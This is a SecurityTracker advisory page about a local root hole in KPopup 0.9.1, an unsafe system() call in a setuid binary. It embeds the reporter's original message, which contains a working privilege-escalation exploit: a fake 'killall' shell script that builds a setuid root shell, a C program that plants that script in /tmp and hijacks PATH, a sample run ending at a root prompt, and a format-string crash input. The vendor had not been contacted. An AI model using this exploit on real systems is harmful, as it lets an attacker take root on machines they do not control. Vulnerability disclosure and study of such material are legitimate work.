Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
KPopup Unsafe system() Calls Let Local Users Execute Arbitrary Commands With Root Privileges
|
|
SecurityTracker Alert ID: 1008018
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Oct 28 2003
|
Impact: Execution of arbitrary code via local system, Root access via local system
|
Exploit Included: Yes
|
Version(s): 0.9.1
|
Description: A vulnerability was reported in KPopup. A local user can obtain root privileges on the target system.
It is reported that the application makes an unsafe system() call and also contains several format string vulnerabilities. As an
example, a local user can exploit a flaw in a system() call in 'misc.cpp'. The system call attempts to execute the following string:
killall
-USR1 kpopup
However, the code does not ensure that the proper 'killall' binary is executed. A local user can create an alternate
'killall' file and modify the path so that when the KPopup application is run, the alternate 'killall' file will be executed.
According
to the report, the binary is configured with set user id (setuid) root user privileges. So, commands in the alternate 'killall'
file will be executed with root privileges.
A demonstration exploit is provided in the Source Message.
|
Impact: A local user can execute arbitrary commands with root privileges on the system.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.henschelsoft.de/kpopup_en.html (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any)
|
Reported By: "b0f www.b0f.net" <b0fnet@yahoo.com>
|
Message History:
None.
|
Source Message Contents
|
Date: 28 Oct 2003 18:12:43 -0000
From: "b0f www.b0f.net" <b0fnet@yahoo.com>
Subject: Local root vuln in kpopup
|
A local root vuln exists in Kpopup version 0.9.1(latest) and
proberly all other versions. It is avaliable from
http://www.henschelsoft.de/kpopup_en.html (main site)
http://www.freebsd.org/ports/net.html
and many other places if you search kpopup on google.
I. BACKGROUND
Kpopup is a KDE program for sending and receiving MS Windows WinPopup
messages. When package is compiled and install the binary kpopup gets
installed suid root it also comes as part of FreeBSD ports collection.
II. DESCRIPTION & EXPLOIT
This app uses the system() call which is very unsafe expecially
on a suid root binary. It also contains Format string bugs in the
sprintf() function. In this advisory i will explain how to obtain
root privlages from this app by exploiting system(). There is 3
places on the misc.cpp source that use system(). The one we use to
exploit this is on line 106.
void sendSignalForNewMessage() {
char command[50];
sprintf(command, "killall -USR1 kpopup");
system(command);
To exploit this what we need to do is make a shell script and call it
killall and place it in the /tmp directory. Here is a script that i
wrote to exlpoit it.
#!/bin/sh
cd /tmp
/bin/cat > shell.c << EOF
#include <stdio.h>
int main()
setuid(0);
setgid(0);
execl("/bin/bash", "-bash", NULL);
return 0;
EOF
/usr/bin/gcc /tmp/shell.c -o /tmp/shell
/bin/chown root.root shell
/bin/chmod 6711 shell
echo "NOW HERE IS YOUR ROOT SHELL"
/tmp/shell
so place this in /tmp as killall and chmod +x it. Now what we need to
do is.
export
PATH=/tmp:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/u
sr/bin:/usr/X11R6/bin:/root/bin:
Once this is done all we need to do is run the binary like so.
/usr/local/kde/bin/kpopup root shell
and thats it we now have root privs.
an example run of this...
[b0f@b0f b0f]$ export
PATH=/tmp:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/u
sr/bin:/usr/X11R6/bin:/root/bin:
[b0f@b0f b0f]$ /usr/local/kde/bin/kpopup root shell
fileerror!
NOW HERE IS YOUR ROOT SHELL
[root@b0f tmp]#
The format strings bugs are in that main.cpp source line 56 and 60
they can be triggered by
[b0f@b0f b0f]$ /usr/local/kde/bin/kpopup %n%n %n%n
Segmentation fault
[b0f@b0f b0f]$
I haven't exploited the fmt bugs. There also seems to be possable race
condtions
in kpopup.
III. EXPLOIT
/*Local root exploit for kpopup
*by b0f www.b0f.net
*/
#include <stdio.h>
int main()
setenv("PATH=/tmp:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:\
/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin:");
FILE *fd;
fd = fopen("/tmp/killall", "w");{
fprintf(fd, "#!/bin/sh\n");
fprintf(fd, "cd /tmp\n");
fprintf(fd, "/bin/cat > shell.c << EOF\n");
fprintf(fd, "#include <stdio.h>\n");
fprintf(fd, "int main()\n");
fprintf(fd, "{\n");
fprintf(fd, "setuid(0);\n");
fprintf(fd, "setgid(0);\n");
fprintf(fd, "execl(\"/bin/bash\", \"-bash\", NULL);\n");
fprintf(fd, "return 0;\n");
fprintf(fd, "}\n");
fprintf(fd, "EOF\n");
fprintf(fd, "/usr/bin/gcc /tmp/shell.c -o /tmp/shell\n");
fprintf(fd, "/bin/chown root.root /tmp/shell\n");
fprintf(fd, "/bin/chmod 6711 /tmp/shell\n");
fprintf(fd, "echo NOW HERE IS YOUR ROOT SHELL\n");
fprintf(fd, "/tmp/shell\n");
fclose(fd);
system("chmod +x /tmp/killall");
system("/usr/local/kde/bin/kpopup root shell");
return 0;
IV. ANALYSIS
An attacker could exploit this issue on a machine running kpopup to
obtain root privileges.
V.DETECTION
This is vulnerable in all versions off kpopup tested on Redhat 9.0
VI. VENDOR
The vendor has not been contacted about this issue.
Regards
b0f (Alan M)
www.b0f.net
|
|
Go to the Top of This SecurityTracker Archive Page
|
